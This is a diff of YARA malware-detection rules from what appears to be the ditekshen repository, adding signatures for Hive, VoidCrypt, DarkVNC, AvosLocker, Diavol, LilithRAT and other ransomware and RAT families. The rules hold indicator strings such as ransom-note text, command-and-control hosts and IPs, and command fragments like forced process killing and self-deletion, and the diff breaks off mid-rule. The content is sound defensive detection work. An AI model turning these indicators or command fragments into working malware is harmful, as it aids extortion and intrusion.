+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6610-L6647"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "713a2cfc95b83de71064e198b26b716790c7cf21674961720695ab6749cb2ad1"
+		logic_hash = "14c20ff2fa62d80eed0f4f364e24d93d493d4f3b47f664983714940afa74046f"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "ef4da71810fb92e942446ee1d9b5f38fea49628e0d8335a485f328fcef7f1a20"
-		importance = 20
+
+	strings:
+		$url1 = "http://hivecust" ascii
+		$url2 = "http://hiveleakdb" ascii
+		$s1 = "encrypt_files.go" ascii
+		$s2 = "erase_key.go" ascii
+		$s3 = "kill_processes.go" ascii
+		$s4 = "remove_shadow_copies.go" ascii
+		$s5 = "stop_services_windows.go" ascii
+		$s6 = "remove_itself_windows.go" ascii
+		$x1 = "/encryptor/" ascii
+		$x2 = "HOW_TO_DECRYPT.txt" ascii
+		$x3 = "FilesEncrypted" fullword ascii
+		$x4 = "EncryptionStarted" fullword ascii
+		$x5 = "encryptFilesGroup" fullword ascii
+		$x6 = "Your data will be undecryptable" ascii
+		$x7 = "- Do not fool yourself. Encryption has perfect secrecy" ascii
+		$v1_1 = ".EncryptFiles." ascii
+		$v1_2 = ".EncryptFilename." ascii
+		$v1_3 = ")*struct { F uintptr; .autotmp_14 string }" ascii
+		$v1_4 = "D*struct { F uintptr; data *[]uint8; seed *uint8; fnc *main.decFunc }" ascii
+		$v1_5 = "golang.org/x/sys/windows.getSystemWindowsDirectory" ascii
+		$v1_6 = "path/filepath.WalkDir" ascii
+		$v2_1 = "taskkill /f /im" ascii
+		$v2_2 = "schtasks /delete /tn" ascii
+		$v2_3 = "encfile.txt" ascii
+		$v2_4 = "README.html" ascii
+		$v2_5 = "total encrypt %v/%v" ascii
+		$v2_6 = "<b>ITSSHOWKEY</b>" ascii
+		$v2_7 = "Recovery your files." ascii
+		$v2_8 = "yaml:\"send_host\"" ascii
+		$v2_9 = "yaml:\"ignore_dir\"" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Milsean Software Limited" and pe.signatures [ i ] . serial == "00:fe:41:94:14:64:b9:99:2a:69:b7:31:74:18:ae:8e:b7" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $url* ) or all of ( $s* ) or 4 of ( $x* ) or 5 of ( $v1* ) or 5 of ( $v2* ) or ( 4 of ( $v2* ) and #v2_1 > 10 ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_29128A56E7B3Bfb230742591Ac8B4718 : FILE
+rule DITEKSHEN_MALWARE_Win_Spyro : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Spyro / VoidCrypt / Limbozar ransomware"
 		author = "ditekSHen"
-		id = "58a9e9f1-531b-5dee-aa11-1537838e9d3f"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "8b3273c4-827e-50ce-983e-a5843f6b5a78"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2079-L2090"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6649-L6675"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "16c9843b5e3edafa64e07626fda494452efa5d0bcaa80d7d80683258c2b9acd4"
+		logic_hash = "2e3be361f6d4283fd312a4486eaa39d6594813937cc3f62dbb603babeff17929"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f9fcc798e1fccee123034fe9da9a28283de48ba7ae20f0c55ce0d36ae4625133"
-		importance = 20
+
+	strings:
+		$s1 = "Decrypt-info.txt" ascii wide
+		$s2 = "AbolHidden" ascii wide
+		$s3 = "C:\\ProgramData\\prvkey" ascii wide
+		$s4 = ".?AV?$TF_CryptoSystemBase@VPK_Encryptor@CryptoPP" ascii
+		$s5 = "C:\\Users\\LEGION\\" ascii
+		$s6 = "C:\\ProgramData\\pkey.txt" fullword ascii
+		$s7 = ".Spyro" fullword ascii
+		$m1 = "Go to C:\\ProgramData\\ or in Your other Drives" wide
+		$m2 = "saving prvkey.txt.key file will cause" wide
+		$m3 = "in Case of no Answer:" wide
+		$m4 = "send us prvkey*.txt.key" wide
+		$m5 = "Somerhing went wrong while writing payload on disk" ascii
+		$m6 = "this country is forbidden.\"}" ascii
+		$c1 = "Voidcrypt/1.0" ascii
+		$c2 = "h1dd3n.cc" ascii
+		$c3 = "/voidcrypt/index.php" ascii
+		$c4 = "&user=" ascii
+		$c5 = "&disk-size=" ascii
+		$c6 = "unique-id=" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Programavimo paslaugos, MB" and pe.signatures [ i ] . serial == "29:12:8a:56:e7:b3:bf:b2:30:74:25:91:ac:8b:47:18" )
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or 4 of ( $c* ) or 3 of ( $m* ) or 8 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00C2Bb11Cfc5E80Bf4E8Db2Ed0Aa7E50C5 : FILE
+rule DITEKSHEN_MALWARE_Win_Darkvnc : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects DarkVNC"
 		author = "ditekSHen"
-		id = "d22ee868-71a7-52f4-93f3-b04b105fd399"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "3c7d215c-fcca-5a0f-b59c-d84fd894677a"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2092-L2103"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6677-L6696"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e54eeea70e85396b26fe188b848ef37c619aae5fc909c1a06ad0bc42fb9b0468"
+		logic_hash = "b0dbde04c0a05e476d505b92cf7dbf3b4ef0dd9e88eafcd21b7a7d0e3623abbd"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f1044e01ff30d14a3f6c89effae9dbcd2b43658a3f7885c109f6e22af1a8da4b"
-		importance = 20
+
+	strings:
+		$s1 = "USR-%s(%s)_%S-%S%u%u" fullword wide
+		$s2 = "BOT-%s(%s)_%S-%S%u%u" fullword wide
+		$s3 = "USR-UnicodeErr(Err)_%s-%s%u%u" fullword ascii
+		$s4 = "BOT-UnicodeErr(Err)_%s-%s%u%u" fullword ascii
+		$s5 = "PRM_STRG" fullword wide
+		$s6 = "bot_shell >" ascii
+		$s7 = "monitor_off / monitor_on" ascii
+		$s8 = "kbd_off / kbd_on" ascii
+		$s9 = "ActiveDll: Dll inject thread for process 0x%x terminated with status: %u" ascii
+		$s10 = "PsSup: File %s successfully started with parameter \"%s\"" ascii
+		$s11 = "PsSup: ShellExecute failed. File: %s, error %u" ascii
+		$s12 = "#hvnc" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rooth Media Enterprises Limited" and pe.signatures [ i ] . serial == "00:c2:bb:11:cf:c5:e8:0b:f4:e8:db:2e:d0:aa:7e:50:c5" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_040Cc2255Db4E48Da1B4F242F5Edfa73 : FILE
+rule DITEKSHEN_MALWARE_Win_RSJON : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects RSJON / Ryzerlo / HiddenTear ransomware"
 		author = "ditekSHen"
-		id = "4673a61f-1c2b-5f92-af28-d55b5d913784"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "7cc3e863-b594-51a9-9d41-68021ce3b97c"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2105-L2116"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6698-L6727"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ade204ebb2bf26515984d20ae459aaea56136acfd37a54abc794969fd05c54ce"
+		logic_hash = "abfea2955bf0d0b0511ea820582cc15fbcfc38dbed71fb2a0050cd98a9311cda"
 		score = 75
-		quality = 75
+		quality = 48
 		tags = "FILE"
-		thumbprint = "1270a79829806834146ef50a8036cfcc1067e0822e400f81073413a60aa9ed54"
-		importance = 20
+
+	strings:
+		$pdb1 = "C:\\Users\\brknc\\source\\repos\\" ascii
+		$pdb2 = "\\rs-jon\\obj\\Debug\\rs-jon.pdb" ascii
+		$pdb3 = "\\rs-jon\\obj\\Release\\rs-jon.pdb" ascii
+		$x1 = "READ_ME_PLZ.txt" wide
+		$x2 = "Files has been encrypted with rs-jon" wide
+		$x3 = ".rsjon" wide
+		$x4 = "bitcoins or kebab" wide
+		$x5 = /rs[-_]jon/ fullword ascii wide
+		$s1 = "SPIF_UPDATEINIFILE" fullword ascii
+		$s2 = "SPI_SETDESKWALLPAPER" fullword ascii
+		$s3 = "bytesToBeEncrypted" fullword ascii
+		$s4 = "SendPassword" fullword ascii
+		$s5 = "EncryptFile" ascii
+		$s6 = "fWinIni" fullword ascii
+		$s7 = "BTCAdress" fullword ascii
+		$s8 = "self_destruck" fullword ascii
+		$c1 = "?computer_name=" wide
+		$c2 = "&serialnumber=" wide
+		$c3 = "&password=" wide
+		$c4 = "&allow=ransom" wide
+		$c5 = "://darkjon.tk/" wide
+		$c6 = "/rnsm/write.php" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Softland SRL" and pe.signatures [ i ] . serial == "04:0c:c2:25:5d:b4:e4:8d:a1:b4:f2:42:f5:ed:fa:73" )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or 6 of ( $s* ) or 4 of ( $c* ) or ( 2 of ( $c* ) and 4 of ( $s* ) ) or ( 1 of ( $pdb* ) and 1 of them ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_3Bcaed3Ef678F2F9Bf38D09E149B8D70 : FILE
+rule DITEKSHEN_MALWARE_Win_Boxcaon : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects IndigoZebra BoxCaon"
 		author = "ditekSHen"
-		id = "decdae98-333f-58b3-8c48-b997da5fc3f3"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "becbde73-8b72-5e98-8684-87068ffff71b"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2118-L2129"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6729-L6746"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9981e0aed672ebfcbe7f0bc1eee6a26a1523b8577d5ee572612aaebf23d1fbcf"
+		logic_hash = "4f2f26e6678d49bfa5937511b1788a059ee10e1b5f19e53d6386199738a925a5"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "45d598691e79be3c47e1883d4b0e149c13a76932ea630be429b0cfccf3217bc2"
-		importance = 20
+
+	strings:
+		$s1 = "<RetCMD null>" fullword wide
+		$s2 = "<txt null>" fullword wide
+		$s3 = "C:\\Users\\Public\\%d\\" fullword wide
+		$s4 = "api.dropboxapi.com" fullword wide
+		$s5 = "/2/files/upload" fullword wide
+		$ts1 = "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" ascii wide
+		$ts2 = "%s /A /C \"%s\" > %s" ascii wide
+		$ts3 = "ersInfo" ascii wide
+		$ts4 = "%svmpid%d.log" ascii wide
+		$ts5 = "%scscode%d.log" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "StarY Media Inc." and pe.signatures [ i ] . serial == "3b:ca:ed:3e:f6:78:f2:f9:bf:38:d0:9e:14:9b:8d:70" )
+		( uint16( 0 ) == 0x5a4d and all of ( $s* ) ) or all of ( $ts* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_091736D368A5980Ebeb433A0Ecb49Fbb : FILE
+rule DITEKSHEN_MALWARE_Win_Avoslocker : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Hunt for AvosLocker ransomware"
 		author = "ditekSHen"
-		id = "fb9446b5-2d49-51de-bedb-ea541d415ae2"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "390e57b2-207e-5013-899a-0b04aa63a56f"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2131-L2142"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6748-L6757"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "858a98ba8fd3244b2c0f6d3dd89a294b0187dd1a82cdcca67c162985d80ca6ed"
+		logic_hash = "85601fdd13ddeb1fc0b8b98eb68e324046d60c1ae9467d083a75abebcb50e3a0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "b1c1dc94f0c775deeb46a0a019597c4ac27ab2810e3b3241bdc284d2fccf3eb5"
-		importance = 20
+
+	strings:
+		$s1 = "GET_YOUR_FILES_BACK.txt" ascii wide
+		$s2 = ".avos" fullword ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ELEKSIR, OOO" and pe.signatures [ i ] . serial == "09:17:36:d3:68:a5:98:0e:be:b4:33:a0:ec:b4:9f:bb" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00E48Cb3314977D77Dedcd4C77Dd144C50 : FILE
+rule DITEKSHEN_MALWARE_Win_Diavol : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Diavol ransomware"
 		author = "ditekSHen"
-		id = "9b708e1b-a878-5244-8fe2-3061f058a9ab"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "df5cea04-505e-5009-b247-ba71b6d81ecc"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2144-L2155"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6759-L6784"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a2ca0ce3812be5e46cb0bc9c73fc4f31294c8d594ca821ad924a3f06cf2430ca"
+		logic_hash = "bcc7a9dc2dcb12ded75af9d79ab0f46f0e69da9e9fe72539be6351306ed11c18"
 		score = 75
-		quality = 75
+		quality = 48
 		tags = "FILE"
-		thumbprint = "025bce0f36ec5bac08853966270ed2f5e28765d9c398044462a28c67d74d71e1"
-		importance = 20
+
+	strings:
+		$s1 = "README_FOR_DECRYPT.txt" ascii wide nocase
+		$s2 = ".lock64" fullword ascii wide
+		$s3 = "LockMainDIB" ascii wide
+		$s4 = "locker.divided" ascii wide
+		$s5 = "%tob_dic%/" wide
+		$s6 = "%cid_bot%" wide
+		$m1 = "GENBOTID" ascii wide
+		$m2 = "SHAPELISTS" ascii wide
+		$m3 = "REGISTER" ascii wide
+		$m4 = "FROMNET" ascii wide
+		$m5 = "SERVPROC" ascii wide
+		$m6 = "SMBFAST" ascii wide
+		$c1 = "/Bnyar8RsK04ug/" fullword ascii
+		$c2 = "/landing" fullword ascii
+		$c3 = "/wipe" fullword ascii
+		$c4 = "&ip_local1=111.111.111.111&ip_local2=222.222.222.222&ip_external=2.16.7.12" fullword ascii
+		$c5 = "&group=" fullword ascii
+		$c6 = "/BnpOnspQwtjCA/register" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BESPOKE SOFTWARE SOLUTIONS LIMITED" and pe.signatures [ i ] . serial == "00:e4:8c:b3:31:49:77:d7:7d:ed:cd:4c:77:dd:14:4c:50" )
+		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or 5 of ( $m* ) or 4 of ( $c* ) or 7 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_1E72A72351Aecf884Df9Cdb77A16Fd84 : FILE
+rule DITEKSHEN_MALWARE_Win_Margulasrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects MargulasRAT"
 		author = "ditekSHen"
-		id = "7972befe-3a88-5ea5-a865-3d008b712bc9"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "6efabf80-9194-542d-afd2-9bf9c8e26e55"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2157-L2168"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6786-L6810"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6555b89f1643f2e461a936df402dcbe8dd5100a1def76c7c6d8f792d1c0ed006"
+		logic_hash = "dd5b94c947d97cdc34032f2cb84b4975a1e8f510638857fb6dbe553bcff7d16e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f945bbea1c2e2dd4ed17f5a98ea7c0f0add6bfc3d07353727b40ce48a7d5e48f"
-		importance = 20
+
+	strings:
+		$pdb1 = "G:\\VP-S-Fin\\memory\\" ascii
+		$pdb2 = "G:\\VP-S-Fin\\Margulas\\" ascii
+		$pdb3 = "G:\\VP-S-Fin\\remote" ascii
+		$pdb4 = "G:\\VP-S-Fin\\" ascii
+		$s1 = "/C choice /C Y /N /D Y /T 1 & Del " fullword wide
+		$s2 = "strToHash" fullword ascii
+		$s3 = "\\socking" fullword wide
+		$s4 = "\\wininets" fullword wide
+		$s5 = "ClientSocket" fullword ascii
+		$s6 = "new Stream()" fullword wide
+		$s7 = "CipherText" fullword ascii
+		$s8 = "WriteAllBytes" fullword ascii
+		$s9 = { 00 50 72 6f 63 65 73 73 00 45 78 69 73 74 73 00}
+		$s10 = "pxR/THCwdLuruMmw8wB8xAUvbno1yPGBTOV9IoOkAp/n7+paQm74pkzlfSKDpAKfTOV9IoOkAp9M5X0ig6QCn0zlfSKDpAKfTOV9IoOkAp" wide
+		$c1 = "149.248.52.61" wide
+		$c2 = "://vpn.nic.in" wide
+		$c3 = "://www.mod.gov.in/dod/sites/default/files/" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Buket and Co." and pe.signatures [ i ] . serial == "1e:72:a7:23:51:ae:cf:88:4d:f9:cd:b7:7a:16:fd:84" )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $pdb* ) and ( 1 of ( $c* ) or 3 of ( $s* ) ) ) or ( 1 of ( $c* ) and 3 of ( $s* ) ) or ( 6 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00B383658885E271129A43D19De40C1Fc6 : FILE
+rule DITEKSHEN_MALWARE_Win_Lilithrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects LilithRAT"
 		author = "ditekSHen"
-		id = "47389dc4-8092-5e12-91a1-f370c9c507a9"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "87e56524-f557-5662-86bc-2b26e7c74aee"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2170-L2181"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6812-L6839"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9312bc8f1005d71393ab63f05bdabff52752ad939dd4311485dc4b56f75eece9"
+		logic_hash = "1e8ac8a329ff99318e12666ea1d90d21bb9b0dff656a5eb1ce741b940c99afd5"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ef234051b4b83086b675ff58aca85678544c14da39dbdf4d4fa9d5f16e654e2f"
-		importance = 20
+		hash1 = "132870a1ae6a0bdecaa52c03cfe97a47df8786f148fa8ca113ac2a8d59e3624a"
+		hash2 = "ab7b6e0b28995bdeea44f20c0aba47f95e1d6ba281af3541cd2c04dc6c2a3ad9"
+		hash3 = "b2eeb487046ba1d341fb964069b7e83027b60003334e04e41b467e35c3d2460f"
+		hash4 = "cebcda044c60b709ba4ee0fa9e1e7011a6ffc17285bcc0948d27f866ec8d8f20"
+
+	strings:
+		$pdb1 = "c:\\Users\\Groovi\\Documents\\Visual Studio 2008\\Projects\\TestDll\\" ascii
+		$pdb2 = "C:\\Users\\iceberg\\Downloads\\RAT-Server-master\\RAT-Server-master\\RAT\\Debug\\RAT.pdb" ascii
+		$pdb3 = "C:\\Users\\Samy\\Downloads\\Compressed\\Lilith-master\\Debug\\Lilith.pdb" ascii
+		$s1 = "log.txt" fullword ascii
+		$s2 = "keylog.txt" fullword ascii
+		$s3 = "File Listing Completed Successfully." fullword ascii
+		$s4 = "Download Execute" fullword ascii
+		$s5 = "File Downloaded and Executed Successfully." fullword ascii
+		$s6 = "C:\\WINDOWS\\system32\\cmd.exe" fullword ascii
+		$s7 = "CMD session closed" ascii
+		$s8 = "Restart requested: Restarting self" fullword ascii
+		$s9 = "Termination requested: Killing self" fullword ascii
+		$s10 = "Couldn't write to CMD: CMD not open" fullword ascii
+		$s11 = "keydump" fullword ascii
+		$s12 = "remoteControl" fullword ascii
+		$s13 = "packettype" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Elekon" and pe.signatures [ i ] . serial == "00:b3:83:65:88:85:e2:71:12:9a:43:d1:9d:e4:0c:1f:c6" )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $pdb* ) or 6 of ( $s* ) or ( 1 of ( $pdb* ) and 4 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Ca7D54577243934F665Fd1D443855A3D : FILE
+rule DITEKSHEN_MALWARE_Win_Epicenterrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects EpicenterRAT"
 		author = "ditekSHen"
-		id = "8519119d-a37b-5438-a642-48e1d40024b8"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "6abe6e94-d7f5-5f88-96a6-a8fad599ef6a"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2183-L2194"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6841-L6863"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "867844464609a043902f07aad3fa568b482259655bc181d992bd409437165790"
+		logic_hash = "e9086dff22e301f57c6a9bdb38fbed8e902d5b8ca20a5e5b3cda56db08d5582e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "2ea2c7625c1a42fff63f0b17cfc4fd0c0f76d7eb45a86b18ec9a630d3d8ad913"
-		importance = 20
+
+	strings:
+		$pdb1 = "c:\\Users\\Zombie\\Desktop\\MutantNinja\\" ascii
+		$pdb2 = "\\Epicenter Client\\" ascii
+		$s1 = "PROCESS_LIST<%SEP%>" fullword wide
+		$s2 = "GETREADY_RECV_FILE<%SEP%>" fullword wide
+		$s3 = "DISPLAY<%SEP%>" wide
+		$s4 = "GETSCREEN<%SEP%>" fullword wide
+		$s5 = "dumpImageName" fullword ascii
+		$s6 = "dumpLoc" fullword ascii
+		$s7 = "EXPECT<%SEP%>filelist<%SEP%>" fullword wide
+		$s8 = "<%FSEP%>FOLDER<%FSEP%>-<%SEP%>" fullword wide
+		$s9 = "KILLPROC<%SEP%>" fullword wide
+		$s10 = "LAUNCHPROC<%SEP%>" fullword wide
+		$s11 = "cmd.exe /c start /b " fullword wide
+		$s12 = "savservice" fullword wide
+		$s13 = "getvrs" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FABO SP Z O O" and pe.signatures [ i ] . serial == "00:ca:7d:54:57:72:43:93:4f:66:5f:d1:d4:43:85:5a:3d" )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $pdb* ) or 5 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_7709D2Df39E9A4F7Db2F3Cbc29B49743 : FILE
+rule DITEKSHEN_MALWARE_Win_Lastconn : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects LastConn"
 		author = "ditekSHen"
-		id = "55e8815f-0885-5eb0-bf85-05bbd874a821"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "18727c30-d84d-5ffa-acd4-2cc54e553604"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2196-L2207"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6865-L6894"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b63fa6e4e92549ae92b9a414390471c49fd50010bb7e10e1db72ff53370a6354"
+		logic_hash = "94f5874353d0fb475595373c06a0de91603cad9b435d35dc00febf90608d6b5a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "04349ba0f4d74f46387cee8a13ee72ab875032b4396d6903a6e9e7f047426de8"
-		importance = 20
+
+	strings:
+		$s1 = "System.Net.Http.SysSR" fullword wide
+		$s2 = "System.Net.Http.WrSR" fullword wide
+		$s3 = "yyyy'-'MM'-'dd'T'HH':'mm':'ss.FFFFFFFK" fullword wide
+		$s4 = { 63 00 6f 00 6e 00 74 00 65 00 6e 00 74 00 0c 6e
+               00 6f 00 74 00 69 00 66 00 79 00 04 06 12 80 e8
+               05 00 00 12 80 e8 08 75 00 73 00 65 00 72 00 08
+               74 00 65 00 61 00 6d 00 06 61 00 70 00 70 00 0c
+               6e 00 6f 00 61 00 75 00 74 00 68 00 }
+		$s5 = { 68 00 69 00 64 00 64 00 65 00 6e 00 10 64 00 69
+               00 73 00 61 00 6c 00 6c 00 6f 00 77 00 0e 65 00
+               78 00 74 00 65 00 6e 00 64 00 73 00 04 69 00 64
+               00 16 75 00 6e 00 69 00 71 00 75 00 65 00 49 00
+               74 00 65 00 6d 00 73 }
+		$s6 = "<RunFileOnes>d__" ascii
+		$s7 = "<UploadFile>d__" ascii
+		$s8 = "<ChunkUpload>d__" ascii
+		$s9 = "<StartFolder>d__" ascii
+		$s10 = "<ReadFileAlw>d__" ascii
+		$s12 = "<WriteFileToD>d__" ascii
+		$s13 = "<ReadFile>d__" ascii
+		$s14 = "<GetUpload>d__" ascii
+		$s15 = "CDropbox.Api.DropboxRequestHandler+<RequestJsonStringWithRetry>d__" ascii
 
 	condition:
